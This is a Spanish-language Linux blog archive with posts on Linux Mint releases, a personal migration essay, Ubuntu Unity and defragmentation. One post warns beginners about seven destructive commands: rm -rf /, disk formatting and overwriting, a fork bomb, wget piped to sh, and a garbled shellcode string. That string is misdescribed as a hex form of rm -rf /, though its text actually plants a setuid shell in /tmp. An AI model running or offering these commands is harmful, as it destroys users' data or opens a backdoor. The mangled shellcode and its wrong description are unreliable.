Blogia

LINUX

Linux Mint 11 katya

Linux Mint 11 katya

ya tenemos Linux Mint 11 katya ,esta versión de Linux Mint desde su salida en versión RC y ya era algo totalmente estable, así que ahora aún más motivos.

lista para descarga la versión de Linux .

 Sección de descargas de la página de Linux Mint.



Linux cumple 20 años

Linux cumple 20 años

La Linux Foundation ha publicado un comunicado en su web oficial, en el que se invita a todo el mundo a unirse en la celebración del 20 aniversario de Linux, además de ofrecer suficiente información como para conseguir una visión general de la evolución del sistema operativo.

Gracias linux

100% Linux

100% Linux

En los años 90, cuando ms-dos dominaba nuestros discos duros de 200 megas e Internet era un sueño lejano, conseguir a través de una revista como PC-Mania un CD con Linux era todo un acontecimiento. Era un sistema operativo para nerds, la mayoría de los compradores de esas revistas apenas sabían qué era un “sistema operativo” y pedirles que entendieran Linux, su instalación, manejo y utilidad era poco menos que pedirles la luna.

Por aquella época tenía infinito tiempo libre (vamos, salvo ir a clase el resto del tiempo era mio) por lo que me aficioné a instalar la “última slackware”, a jugar con el “LILO” o a modificar programas con el GCC. Sin Internet y con la grandísima cantidad de software (libre) que tenía cada uno de aquellos CDs, trastear con Linux era de lo mejor que se podía hacer con un ordenador.

Sin embargo, conforme fue pasando el tiempo, el tiempo de ocio se fue reduciendo, especialmente, al llegar a la universidad. Linux por aquél entonces era un sistema operativo muy sólido, pero inmaduro. Le faltaba soporte para mucho hardware, carecía de software de entidad y el interfaz gráfico (”las X”), solían colgarse bastante. Pretender trabajar seriamente con Linux era una utopía en aquél momento y los competidores acechaban. Distintas empresas vieron lo importante que iba a ser posicionarse en el mercado de los sistemas operativos multitarea. Por ejemplo, recuerdo que IBM sacó una nueva versión de OS/2 para 32 bits, todo un acontecimiento. Aunque fue jodido, pero conseguí a través de un chico cuyo padre trabajaba en IBM que me pasaran una versión 2.1 de OS/2 en disquette (creo que unos 20 disquettes). Aquello era impresionante, un interfaz gráfico impecable que no se colgaba y venía con un montón de aplicaciones. Hasta aprendí Rexx en esa época. Sin embargo, por una razón u otra no triunfó y aunque era capaz de ejecutar ciertos programas de MS-Dos, apenas llegó a tener aplicaciones nativas que le dieran vidilla. Hasta la versión 3.0 (”Warp”) le seguí la pista, pero la llegada de Windows 95 lo eclipsó todo.

He de confesar que desde que instalé Windows 95, poco a poco fuí dejando de utilizar otros sistemas operativos hasta que cuando cambié mi viejo 486 por un Pentium II formateé el disco en una única partición en la que solo entró el sistema operativo de Microsoft. No es que me gustara más Windows que Linux o OS/2, era simplemente una cuestión práctica: los fabricantes sacaban solo para Windows el software que yo necesitaba y no tenía tiempo para buscar/crear alternativas. Seamos sinceros, los programas de aquella época que corrían en el interfaz gráfico no eran estables.

Durante ese tiempo tuve un par de “encuentros” con Linux: en la universidad se utilizaba en algunas prácticas y mi primer trabajo en Panda Software fue adaptar el kernel del antivirus para funcionar en Linux. Más allá de esas coincidencias, que se saldaron casi siempre con el uso de 2 programas (vi y gcc), mis ordenadores pasaron por Windows 9x, 2000 y XP, sin conocer un Linux.

Con la aparición de Vista, la cosa empezó a cambiar. Me negué en redondo a instalar aquella cosa. Hasta hace un par de años mantenía mi viejo XP, no necesitaba nada más, hasta el día D. Ese día, el disco duro de mi ordenador principal decidió morir y me vi en la obligación de instalar otro y reinstalar Windows. En el punto crítico en el que te solicita tu número de licencia y lo comprueba en su base de datos, la compañía de Richmond decidió que mi número no era válido y que no podía instalar SU sistema operativo. Me cabreó mucho, les llamé y las soluciones que me dieron era cuanto menos que peregrinas. Tras dos días sin poder instalar el sistema operativo que yo había comprado (bueno, que me obligaron a comprar con el ordenador), decidí empezar a buscar números de seríe en Internet a ver si colaba, pero nada. Solo tenía dos salidas: bajarme un Windows pirata del emule o bajarme un Linux vía FTP. Y afortunadamente decidí lo segundo.

Volví a reencontrarme con Linux casi 15 años más tarde. Confieso que al principio temí que no reconociera el hardware que tenía instalado o que se colgara cada dos por tres, pero nada de eso, en una tarde estuvo funcionando todo a la perfección hasta la fecha. Los primeros pasos fueron muy fáciles, ahora Linux es tan intuitivo como Windows. La verdad es que encontré bastante cambiado en el interfaz, pero el resto seguía igual, manteniendo el mismo espíritu y la misma robustez que siempre había tenido, además de conservar intacta la filosofía de funcionamiento, distribución y desarrollo que tanto me entusiasmó en su momento. Como ahora mi trabajo se centra en proyectos para la web, la migración a Linux no solo fue fácil, sino que además mejoró mi ritmo de trabajo al disponer en mi ordenador de desarrollo de un entorno prácticamente idéntico al de mi servidor de producción.

Poco a poco en estos últimos meses he ido desterrando Windows de mis equipos de trabajo. Hasta ahora conservaba una máquina con Windows instalada ya que tenía algunas necesidades que no podía resolver en Linux. Una de ellas era la edición de vídeo sencilla y rápida y la otra la conectividad y edición de mapas y rutas con mi GPS Garmin. Hace unas semanas descubrí OpenShot y hace unos días encontré QLandkarte GT. Ahora ya no necesito Windows para nada y me dispongo a eliminar completamente cualquier rastro de ese sistema operativo. Linux es más rápido, más estable y más libre. Y además no me da por saco.

Desgraciadamente tendré que dejar una imagen de VirtualBox con XP para realizar pruebas de compatibilidad con Internet Explorer… Disponer de una posición de mercado privilegiada es lo que tiene: te obliga a trabajar para ellos

 fuente: 

http://blog.ivangadea.com/2011/02/17/100-linux/

7 comandos que jamás debes ejecutar en Linux.

7 comandos que jamás debes ejecutar en Linux.

 Hay algunos que tenemos pavor de que algún día nuestro GNU/Linux truene si eres nuevo en esto de Linux, las oportunidades de que alguién te engañe diciendote que uses algún comando para destruir tu sistema son muy altas, por eso es bueno conocer los comandos más peligrosos para GNU/Linux, en Tech Source from Bohol hay un listado de los 7 comando más mortales para Linux, (traducción en Nierox) , algunos de estos comandos pueden formatear el disco duro, dañar los archivos, etc.

Navegando en la red encontramos lo siguiente:

  1. rm -rf /
    Este comando borrará de manera recursiva y convincente todos los archivos en el directorio raíz, aquí tienes un video para ver en acción el comando rm -rf /.

  2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p
    release */
    = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″
    “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″
    “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″
    “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″
    “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″
    “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″
    “x6ex2fx73x68x00x2dx63x00″
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Esta es la versión hexadecimal de rm-rf / que pueden engañar hasta a los usuarios expertos de Linux.

  3. mkfs.ext3 /dev/sda
    Este comando formatea la partición que se menciona después de mkfs.

  4. :(){:|:&};:
    A este comando se le conoce cómo bomba fork, ejecutar un gran número de procesos hasta que el sistema se congela. Esto puede conducir a la corrupción de datos.

  5. cualquier_comando > /dev/sda
    Este comando provoca perdida total de datos, en la particion que se menciona en el comando

  6. wget http://alguna_fuente_no_confiable -O- | sh
    Esto descarga paquetes de alguna fuente no confiable y la ejecuta, debes tener mucho cuidado ya que puede ser código malicioso

  7. mv /home/tu-carpeta-home/* /dev/null
    Este comando va a mover todo el contenido de tu carpeta Home a un directorio que no existe, esto significa que ya nunca volverás a ver tus archivos.

Por ninguna razón vayas a ejecutar estos comando en Linux, esto es más bien con fines didácticos, no queremos que pases un mal día de muertos!!

fuente:

http://www2.linuxparatodos.net/web/comunidad/noticias-y-blogs/-/blogs/feliz-dia-de-muertos-con-7-comandos-que-jamas-debes-ejecutar-en-linux

Linux Mint seguirá el camino clásico

"Documental Codigo Linux de “La2″. Historia do Software Libre, contada a través do proxecto GNU/Linux, onde se entrevista aos personaxes máis relevantes do sector: Richard Stallman, Linus Torvalds…Responde as seguintes preguntas: 1.- Sentido orixinal da palabra “Hacker” 2.- País e ano de nacemento de Linus Torvalds. 3.- ¿A qué se refiren os términos “Linux”, “GNU”, “GNU/Linux”? 4.- ¿A partir de qué sistema operativo se creou Linux? 5.- ¿En qué consiste a licencia GPL e cál é a súa finalidade? 6.- Investiga os términos Geeks, Nerds. 7.- ¿En qué ano apareceu a versión 1.0 de Linux? 8.- ¿Cál foi a aportación de Richard Stallman? 9.- ¿Cal é a ambigüedade do término “Software Libre” en inglés? 10.- ¿Qué significa o término “open source”? 11.- ¿Cal é a parte comercial do software libre? ¿Por qué servicios se cobra?"Linux Mint seguirá el camino clásico: ni Unity ni GNOME Shell Parece que GNOME Shell, aún en desarrollo, no está convenciendo mucho, ni a sus potenciales usuarios, ni a los reponsables de las distribuciones que harán uso de él -o mejor, de GNOME 3-. Ya se están viendo los primeros movimientos: comenzó Ubuntu con su Unity y ahora es Linux Mint quien se desmarca de GNOME Shell, pero también del futuro más cercano de su “distro madre”.

LinuxMint

En Muktware han recogido unas declaraciones de Clement Lefebvre, principal responsable de Linux Mint, en las que deja claro cuales serán los próximos movimientos en esta distribución:

No estamos planeando cambiar a Unity, mantendremos nuestro escritorio lo más parecido a lo que es en este momento. Es difícil decir cómo vamos a lograrlo técnicamente, pero el objetivo es usar GNOME 3 sin GNOME Shell :)

A raíz de ésto también se le preguntó por Wayland -un proyecto casi desconocido para el gran público hace menos de una semana pero que tras el anuncio de Mark Shuttleworth está en boca de todos estos días-, a lo que Lefebvre respondió:

… es un proyecto interesante. Ubuntu no va a cambiar a Wayland este año, las próximas versiones mantendrán X por el momento. El respaldo de Canonical a este proyecto podría ponerlo al día como una alternativa muy interesante y un buen sucesor de X… el futuro lo dirá. Por ahora estamos con X sin planes de cambiar, pero mantendremos un ojo en el desarrollo de Wayland para ver hacia dónde se dirige en un futuro cercano.

Está claro. Al menos en lo que respecta a sus próximas ediciones, Linux Mint seguirá por el camino clásico al que tenía acostumbrados a sus usuarios, en GNOME 3 (eso sí, con un solo panel -inferior-, a su estilo).

Lefebvre concluye sin cerrar las puertas a nada, pero remarcando lo ya dicho:

De todos modos, es demasiado pronto para hablar de ésto. Mint 10 está a punto de ser liberada, y Mint 11 vendrá con el mismo escritorio y el mismo servidor X en unos 6 meses.

Me da a mí, que si les sale bien la jugada, desde Linux Mint pueden dar la campanada y hacerse con mucho usuario descontento este 2011 que viene. ¿Qué opináis?"

Cualidades de Linux Mint 8 'Helena', 3D Efectos...

Cualidades de Linux Mint 8 'Helena', 3D Efectos...

la verdad es que se ve de putisima madre

Ubuntu Unity

Desde Canonical siguen ofreciéndonos muestras de los que es capaz su equipo de diseño. Una de las últimas muestras que nos han dejado de su trabajo es el vídeo donde muestran el trabajo que están haciendo con la interfaz que lucirán los netbooks que tengan instalado Ubuntu y su esperada interfaz. ¿Así será Ubuntu Unity cuando termine el proceso de desarrollo o tendrá muchos cambios? Veremos como evoluciona el proyecto y por el momento vamos a comentar en el punto actual lo que nos han mostrado.

La principal novedad es el lanzador de aplicaciones que tenemos en el lateral izquierdo de la pantalla. No se trata de un dock a la manera que estamos acostumbrados en Ubuntu con Docky o Cairo-Dock sino que el concepto es algo distinto. Sería como una gran barra de botones donde los iconos son muy fáciles de encontrar, mover o llevarnos al escritorio.

 

Se trata de mantener los iconos siempre visibles, que la barra sea fácil de recorrer y los iconos no tendrán efectos, además mantendrán el mismo tamaño tratando de que estén visibles el mayor número posibles. El objetivo es que el lanzador se optimice para una pantalla de 600 píxeles de alto, pensando también en el uso con pantallas táctiles buscando la mejor usabilidad para el usuario.  

La utilización del acordeón permitirá que los iconos sean más grandes y para lo cual una parte de ellos quedan en perspectiva con un efecto acordeón al desplegarse que permite que en el mismo espacio, los iconos se vean más grandes sin reducir el número de los mostrados. Esto será más importante en el momento en que se utilicen la pantalla táctil. Unity está pensado para ser manejado de forma táctil y en ello de momento parece que van bien encaminados.

Lo que más me llama la atención de todo el sistema es que parece perfecto para manejar tablets, pero sin embargo desde Canonical han desmentido las noticias en este sentido. Muchos de los usuarios de Ubuntu les gustaría verlo en un dispositivo de estas características, pero a la vez comprendo la postura de la compañía, puesto que no parece que el equipo de diseño, aún realizando un buen trabajo no está maduro para dar el salto al manejo de toda la interfaz de forma táctil. ¿Qué pasa cuando tengamos abierta la aplicación? ¿Acertaremos con el dedo a la crucecita? Una vez resuelvan estas y otras cuestiones similares seguro que piensan el dar el salto a los tablets. ¿Será entonces demasiado tarde?

WikiUnix: aprende los comandos de Linux por niveles

WikiUnix: aprende los comandos de Linux por niveles

WikiUnix es una plataforma educativa, en línea y libre con filosofía wiki para que aprendamos y asimilemos conceptos y comandos de los sistemas operativos Un*x (GNU/Linux incluido). Además, nos proporciona un entorno para hacer los ejercicios y autocorregirlos basado en una máquina virtual de Xubuntu.

En WikiUnix los artículos están divididos en los siguientes niveles:

Por si todo esto no fuera poco, tenemos disponibles también los documentos en PDF correspondientes a cada uno de los niveles.

Sin duda un sitio en los que pasar horas y horas aprendiendo y, por qué no, colaborando.

Yo confieso: soy de Linux

Yo confieso: soy de Linux

Si, tengo que confesarlo, he pecado, soy de Linux, porque … Quiero hablarle de tú a tú a la máquina, que el usuario tenga el control. No quiero

Si, tengo que confesarlo, he pecado, soy de Linux, porque …

  • Quiero hablarle de tú a tú a la máquina, que el usuario tenga el control.
  • No quiero que me fuercen a usar estándares cerrados, prefiero usar código libre que siempre esté disponible y pueda mejorar.
  • Prefiero aprender a que “me enseñen”
  • Las comunidades son más grandes y más fuertes que las empresas.
  • Quiero un sistema operativo escalable, a la medida del crecimiento de mis conocimientos.
  • No quiero tener que esperar a que otros me ofrezcan funcionalidades, quiero crecer yo creándolas.
  • Me gusta poder elegir mi entorno de ventanas, no esperar actualizaciones “gracias” a Apple o Microsoft.
  • Quiero elegir que paquetes, servicios y aplicaciones instalar en “mi” ordenador.

Seguro que hay más motivos pero estos son los míos ¿y los tuyos?

¿Es necesario desfragmentar en Linux?

¿Es necesario desfragmentar en Linux?

Pregunta del millón que es típica de muchos usuarios noveles y que tiene -como casi todo- una respuesta corta y una larga. La corta es un sencillo y rotundo no. No hace falta desfragmentar volúmenes del disco que estemos usando para Linux.

La larga, como dicen en ghacks.net, es algo más compleja. No es necesario desfragmentar, desde luego, pero eso no significa que no podamos chequear el estado de fragmentación de una unidad y desfragmentarla casi por puro placer.

La razón más importante para que no sea necesaria la desfragmentación es el hecho de que la mayoría de los ficheros del sistema necesitan permisos de superusuario para moverse de un lado a otro, así que normalmente los ficheros “importantes” no se mueven, y solo son nuestros directorios raíz (en /home) los que puede que tengan más actividad.

La otra razón es que mientras que en otros sistemas operativos los sistemas de ficheros utilizados tienen como problema esa fragmentación -muy famosa en los FAT y FAT32, y también en NTFS- en los sistemas de ficheros de Linux la búsqueda de huecos para almacenar los ficheros es distinta, y es probable que la única situación en la que una fragmentación sea recomendable es cuando la unidad está llena a más del 95% de su capacidad.